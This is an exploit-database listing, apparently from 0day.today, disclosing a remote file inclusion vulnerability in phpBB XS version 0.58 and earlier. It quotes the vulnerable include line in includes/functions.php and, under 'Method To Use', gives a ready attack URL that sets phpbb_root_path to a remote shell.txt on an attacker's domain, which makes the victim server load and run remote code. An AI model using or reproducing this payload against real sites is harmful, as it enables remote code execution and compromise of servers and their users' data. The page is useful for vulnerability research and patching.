[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability

Author
AzzCoder
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-818
Category
web applications
Date add
11-09-2006
Platform
unsorted
==================================================================
phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability
==================================================================



Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?




#  0day.today [2024-07-08]  #